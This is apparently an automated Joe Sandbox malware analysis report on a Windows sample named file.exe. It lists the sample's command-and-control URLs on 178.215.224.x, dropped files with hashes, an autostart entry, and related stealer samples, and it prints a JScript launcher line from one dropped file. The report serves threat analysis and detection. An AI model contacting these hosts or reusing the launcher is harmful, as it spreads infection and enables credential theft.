http://178.215.224.74/v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.#100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    EaUMrTLEnhJoi.EaUMrTLEnhJoi
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?gitrue
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=8true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=7true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=6true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=5true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.phptrue
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=31true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3Dtrue
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=truetrue
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.252/v10/ukyh.php?jspo=6false
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhltrue
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?uvyw=2true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?uvyw=6true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3Dtrue
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46true
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2true
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://178.215.224.74/v10/ukyh.php?jspo=6hcurl.exe, 00000042.00000002.2875914285.0000000002EB8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://178.215.224.74/v10/ukyh.curl.exe, 0000001F.00000002.2635866333.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004E.00000002.2962664358.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000060.00000002.3114079501.0000000003019000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://www.sysinternals.comPsInfo.exe.52.dr, PsInfo64.exe.52.drfalse
        high
        http://www.autoitscript.com/autoit3/XFinish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Finish.com, 0000000A.00000000.2072323942.0000000000625000.00000002.00000001.01000000.00000007.sdmp, InnoSphere.scr, 00000010.00000000.2231353404.0000000000F05000.00000002.00000001.01000000.00000009.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.drfalse
          high
          http://nsis.sf.net/NSIS_ErrorErrorfile.exe, RevenueDevices.exe.10.drfalse
            high
            https://www.autoitscript.com/autoit3/Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.drfalse
              high
              http://www.info-zip.org/zip-bug.html;azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, zip.exe.52.dr, azvw.exe.10.drfalse
                high
                ftp://ftp.info-zip.org/pub/infozipazvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://178.215.224.74/v10/ukyh.NNAME=ConsoleShcurl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://178.215.224.74/v10/ukyh.php?jspo=60%curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://178.215.224.74/v10/ukyh.php?jspo=6Qcurl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://178.215.224.74/v10/ukyh.php?jspo=6Tcurl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://178.215.224.252/v10/ukyhcurl.exe, 00000018.00000002.2549469870.0000000002829000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                http://www.info-zip.org/azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, zip.exe.52.drfalse
                  high
                  http://178.215.224.74/v10/ukyh.php?jspo=7wk0curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://178.215.224.74/v10/ukyh.%curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://178.215.224.74/v10/ukyh.php?jspo=6ccurl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmlcurl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://178.215.224.74/v10/ukyh.#curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://178.215.224.74/v10/ukyh.ccurl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  178.215.224.252
                  unknownGermany
                  10753LVLT-10753USfalse
                  178.215.224.74
                  unknownGermany
                  10753LVLT-10753UStrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1561834
                  Start date and time:2024-11-24 12:03:05 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 11m 29s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:228
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.rans.spre.expl.evad.winEXE@323/65@3/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 79
                  • Number of non-executed functions: 122
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.95.31.18
                  • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, GyxNFpxuLvDE.GyxNFpxuLvDE, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: file.exe
                  TimeTypeDescription
                  06:03:55API Interceptor1x Sleep call for process: file.exe modified
                  06:04:00API Interceptor4979x Sleep call for process: Finish.com modified
                  06:04:16API Interceptor1x Sleep call for process: InnoSphere.scr modified
                  06:04:21API Interceptor1x Sleep call for process: WMIC.exe modified
                  12:04:05AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  178.215.224.252vqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                  • 178.215.224.252/v10/ukyh.php?jspo=6
                  044f.pdf.exeGet hashmaliciousUnknownBrowse
                  • 178.215.224.252/v10/ukyh.php?jspo=6
                  stealer.exeGet hashmaliciousUnknownBrowse
                  • 178.215.224.252/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D
                  stealer.exeGet hashmaliciousUnknownBrowse
                  • 178.215.224.252/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D
                  chrome.exeGet hashmaliciousUnknownBrowse
                  • 178.215.224.252/v10/ukyh.php?jspo=6
                  chrome.exeGet hashmaliciousUnknownBrowse
                  • 178.215.224.252/v10/ukyh.php?jspo=6
                  178.215.224.74vqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                  • 178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true
                  044f.pdf.exeGet hashmaliciousUnknownBrowse
                  • 178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9A7060554A2A0FC233A18A84321FDA&zjyp=true&yuvc=false&nzrj=00000&sftb=true
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  bg.microsoft.map.fastly.netListaItensVistoriaCorpodeBombeirosObrigatorio.msiGet hashmaliciousAteraAgentBrowse
                  • 199.232.210.172
                  registration.msiGet hashmaliciousAteraAgentBrowse
                  • 199.232.214.172
                  Digital.msiGet hashmaliciousAteraAgentBrowse
                  • 199.232.214.172
                  file_66efd0132ceed.msiGet hashmaliciousAteraAgentBrowse
                  • 199.232.214.172
                  Guidelines_for_Citizen_Safety.msiGet hashmaliciousAteraAgentBrowse
                  • 199.232.210.172
                  e0#U05ea.msiGet hashmaliciousAteraAgentBrowse
                  • 199.232.214.172
                  ReceitaFederal-consulta-yFZMA-45896_v.3_35687.msiGet hashmaliciousAteraAgentBrowse
                  • 199.232.214.172
                  zapret.exeGet hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  canva.batGet hashmaliciousUnknownBrowse
                  • 199.232.210.172
                  file.exeGet hashmaliciousJasonRATBrowse
                  • 199.232.210.172
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  LVLT-10753USvqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                  • 178.215.224.74
                  i486.elfGet hashmaliciousMiraiBrowse
                  • 168.215.128.210
                  JGWfssorui.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  ElTZP4yjRG.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  H6PtrbXJ9Q.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  Mj1o4aZG6y.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  OYGqoSlvmi.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  5vcrbMCVE7.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  OD195KrzCl.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  VKxD9FFAj0.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  LVLT-10753USvqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                  • 178.215.224.74
                  i486.elfGet hashmaliciousMiraiBrowse
                  • 168.215.128.210
                  JGWfssorui.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  ElTZP4yjRG.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  H6PtrbXJ9Q.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  Mj1o4aZG6y.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  OYGqoSlvmi.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  5vcrbMCVE7.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  OD195KrzCl.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  VKxD9FFAj0.dllGet hashmaliciousDanaBotBrowse
                  • 193.56.146.53
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSeT_up.exeGet hashmaliciousLummaC StealerBrowse
                    Setup.exeGet hashmaliciousLummaCBrowse
                      6duXSAApsY.exeGet hashmaliciousUnknownBrowse
                        6duXSAApsY.exeGet hashmaliciousUnknownBrowse
                          mod01_pdf.lnkGet hashmaliciousUnknownBrowse
                            file.exeGet hashmaliciousSmokeLoaderBrowse
                              mQC9xlWFZV.exeGet hashmaliciousPureLog StealerBrowse
                                mQC9xlWFZV.exeGet hashmaliciousPureLog StealerBrowse
                                  Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                    cXwjp02Fln.exeGet hashmaliciousDCRat, VidarBrowse
                                      Process:C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):179
                                      Entropy (8bit):4.6538602174132935
                                      Encrypted:false
                                      SSDEEP:3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5sxEGIJZo5uWAX+aJp6/h4EkD5sxESMn:RiJBJHonwWDaJ0/hJkDl/ywWDaJ0/hJg
                                      MD5:409A32BB62B7A9E182F415F7F4EBCE54
                                      SHA1:3D52549B26AD0FF647452BC2DC4F33EDD02A2368
                                      SHA-256:7872D387A3290544BCBA5F0F60A6601B58DBF7A49226D19A4B41A541166D0A0D
                                      SHA-512:9A516B9649D711969FEA31E7AC42A8D338FCBDB757198F21F0AE23D208EE28E0175C012B6A5CD7F6454D9C6BFABB8A13C5473A4F26FB546F15D0CB713216E6AA
                                      Malicious:true
                                      Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\InnoSphere Dynamics\\InnoSphere.scr\" \"C:\\Users\\user\\AppData\\Local\\InnoSphere Dynamics\\l\"")
                                      Process:C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):947288
                                      Entropy (8bit):6.630612696399572
                                      Encrypted:false
                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                      MD5:62D09F076E6E0240548C2F837536A46A
                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: SeT_up.exe, Detection: malicious, Browse
                                      • Filename: Setup.exe, Detection: malicious, Browse
                                      • Filename: 6duXSAApsY.exe, Detection: malicious, Browse
                                      • Filename: 6duXSAApsY.exe, Detection: malicious, Browse
                                      • Filename: mod01_pdf.lnk, Detection: malicious, Browse
                                      • Filename: file.exe, Detection: malicious, Browse
                                      • Filename: mQC9xlWFZV.exe, Detection: malicious, Browse
                                      • Filename: mQC9xlWFZV.exe, Detection: malicious, Browse
                                      • Filename: Og1SeeXcB2.exe, Detection: malicious, Browse
                                      • Filename: cXwjp02Fln.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):529955
                                      Entropy (8bit):7.99966998402238
                                      Encrypted:true
                                      SSDEEP:12288:4k4Yt0ftM/HDv+2bvSvVrXBMBoyexw2xwHQVMDo9CkwD8L75z:J49ftWCcU9RMBclCXa75z
                                      MD5:C258A613AB84A979E95AD56BA0357549
                                      SHA1:D1620EF85C0AAF92409645C3906B4CD4ED42BD4F
                                      SHA-256:1D90413D31A1017076E15A719B4AE6A7C4DA83687201E88D545968D83C49E633
                                      SHA-512:02C6E5AA27D299C25502010E62D128570DC2200239589E8D3EDC56DA0089A7A013317F66864A3E24F2CEC7447BBDE91F9249FF2BEB01B0A2C34C79CB20B04771
                                      Malicious:true
                                      Preview:3R)..?......u..?SC.RB.-.....U...u.8...A..;..[.%c......W.j.:...C.......H....&.H.m.}..6..<....v..:..t..{...G..C......^{*l.h..L...\.....).,<.\c..7..2:.gAIN .&......Cg..A...2>;.$a.....qlH6d....n..^|.f-.od.4..>..n7<.>Vu........ ...Q...$Bi7E(&.<..2.....HXA...#qa.S..........l.?...C....?j...E..:.g)w(.....Jo..O.P..y..^._%.`...q.go.......j.....b>.j....e.|.4.4oy;....~*0..x........ ..b+r.K!r.!V....,..e.......0..y.Y.4.%.......Wv.m.#\..|...u1.....2.....EtP.t....{%qOwN.D("......x$zG..n..N.(......v...nc...z...:eq...%.9....,5..g..g]o?Z.}.h...76.n.....=..8S7.6......2.......a..i.`e.8.P PY!.Ff2...G..<....|.I..m...".Y.:...K.h..Wg:..$pho?....xa\.n.Zp).cg.....u,"3J.*.g'...2]E..e...Y-...{$....u.-w.+D...Nas........j..o..j.Y~M0.`.!.`.V._...N..."`z;....W"b.B..Je..Z.......;.6.....&i.=]..W...F.^.|...+o/..r...wp..3..wM.?8q....S..s.S1w.:.W....B.O.*.]3....a....bt..|Ic c.Z......).\?.......eWG#ni........E@W..L.h.#.2..om...6D<...S{.b+`.LDb.+...H.E.eXx.W.Y.......2k.
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):943784
                                      Entropy (8bit):6.625461630496363
                                      Encrypted:false
                                      SSDEEP:24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
                                      MD5:78BA0653A340BAC5FF152B21A83626CC
                                      SHA1:B12DA9CB5D024555405040E65AD89D16AE749502
                                      SHA-256:05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
                                      SHA-512:EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 5%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):40
                                      Entropy (8bit):3.8725738836114343
                                      Encrypted:false
                                      SSDEEP:3:3JEaWNFWDiA7VFov:3JEXWDiA7VFov
                                      MD5:E8C8355C0C045BB2F880552A8CDF802C
                                      SHA1:60BD687E45F6AD3D3B41CB84FFC1AF8768F48AC9
                                      SHA-256:E38898BD136D34BA374A074BE6D95E3892772C40D3F13071991BA2344BC667B5
                                      SHA-512:EF413359C3F4341253AD37456DE1E77CE02292DC7AED1F2ECC62DC59D9C122B6376AD1CF4A9BBD0F2C374DB1EADECA3D27F16F582D9E42C61607891C20E61E05
                                      Malicious:false
                                      Preview:displayName ..Windows Defender ..
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):82
                                      Entropy (8bit):3.054487465026234
                                      Encrypted:false
                                      SSDEEP:3:QBWlhjltP4rlnl+SliFlhakDBuFovn:QAjjHwrn+SkUkDkSvn
                                      MD5:7E057A66D876982B5B7E73CB8B59E0DA
                                      SHA1:476CB1CD6ECF19FCB707054562CD4A4D5BEC414A
                                      SHA-256:DBD0C7EEC70B9A99C0D9B50C785A3CEAC3DCE684E3681EBCAE86A4556E8409E1
                                      SHA-512:B8A249A1950AB014D04BE0CED4E4099EAA4C1BBCD961E3EE0806D9698301E6CF04E086C8B969F6C0563FAF6562D31A323DA47A79AC2FD51465903740B53D7ACF
                                      Malicious:false
                                      Preview:..d.i.s.p.l.a.y.N.a.m.e. . . . . . . .....W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. . .....
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):947288
                                      Entropy (8bit):6.630612696399572
                                      Encrypted:false
                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                      MD5:62D09F076E6E0240548C2F837536A46A
                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):529955
                                      Entropy (8bit):7.99966998402238
                                      Encrypted:true
                                      SSDEEP:12288:4k4Yt0ftM/HDv+2bvSvVrXBMBoyexw2xwHQVMDo9CkwD8L75z:J49ftWCcU9RMBclCXa75z
                                      MD5:C258A613AB84A979E95AD56BA0357549
                                      SHA1:D1620EF85C0AAF92409645C3906B4CD4ED42BD4F
                                      SHA-256:1D90413D31A1017076E15A719B4AE6A7C4DA83687201E88D545968D83C49E633
                                      SHA-512:02C6E5AA27D299C25502010E62D128570DC2200239589E8D3EDC56DA0089A7A013317F66864A3E24F2CEC7447BBDE91F9249FF2BEB01B0A2C34C79CB20B04771
                                      Malicious:true
                                      Preview:3R)..?......u..?SC.RB.-.....U...u.8...A..;..[.%c......W.j.:...C.......H....&.H.m.}..6..<....v..:..t..{...G..C......^{*l.h..L...\.....).,<.\c..7..2:.gAIN .&......Cg..A...2>;.$a.....qlH6d....n..^|.f-.od.4..>..n7<.>Vu........ ...Q...$Bi7E(&.<..2.....HXA...#qa.S..........l.?...C....?j...E..:.g)w(.....Jo..O.P..y..^._%.`...q.go.......j.....b>.j....e.|.4.4oy;....~*0..x........ ..b+r.K!r.!V....,..e.......0..y.Y.4.%.......Wv.m.#\..|...u1.....2.....EtP.t....{%qOwN.D("......x$zG..n..N.(......v...nc...z...:eq...%.9....,5..g..g]o?Z.}.h...76.n.....=..8S7.6......2.......a..i.`e.8.P PY!.Ff2...G..<....|.I..m...".Y.:...K.h..Wg:..$pho?....xa\.n.Zp).cg.....u,"3J.*.g'...2]E..e...Y-...{$....u.-w.+D...Nas........j..o..j.Y~M0.`.!.`.V._...N..."`z;....W"b.B..Je..Z.......;.6.....&i.=]..W...F.^.|...+o/..r...wp..3..wM.?8q....S..s.S1w.:.W....B.O.*.]3....a....bt..|Ic c.Z......).\?.......eWG#ni........E@W..L.h.#.2..om...6D<...S{.b+`.LDb.+...H.E.eXx.W.Y.......2k.
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):83968
                                      Entropy (8bit):7.99784242676174
                                      Encrypted:true
                                      SSDEEP:1536:PzVgzZ8bQPhehNmUuzMKtJE/qjFJwtFO3xzJ7WtKi2cnJqczvwvfUM2XOj09NkK:PJg7ehNmXntgKFJwtFO3z4KfcnEczvNB
                                      MD5:C5C9551F30A44AAB6152B932F7149053
                                      SHA1:C5B31ED9091D873883A9BA4A1D19A1C8C50020F8
                                      SHA-256:ECC645D9AD7E7C4AD052E519F44D314CA15CE749FAFD2BE4384121704E1B26FD
                                      SHA-512:83DD79769DD3F0D0625742AF94309FD5DED51615F9278CEBB558E03777E5346BAF08D3D6AA3C6C84DF41A3E321BEC83FAD828C218E85F3E1D88276DF17797E98
                                      Malicious:true
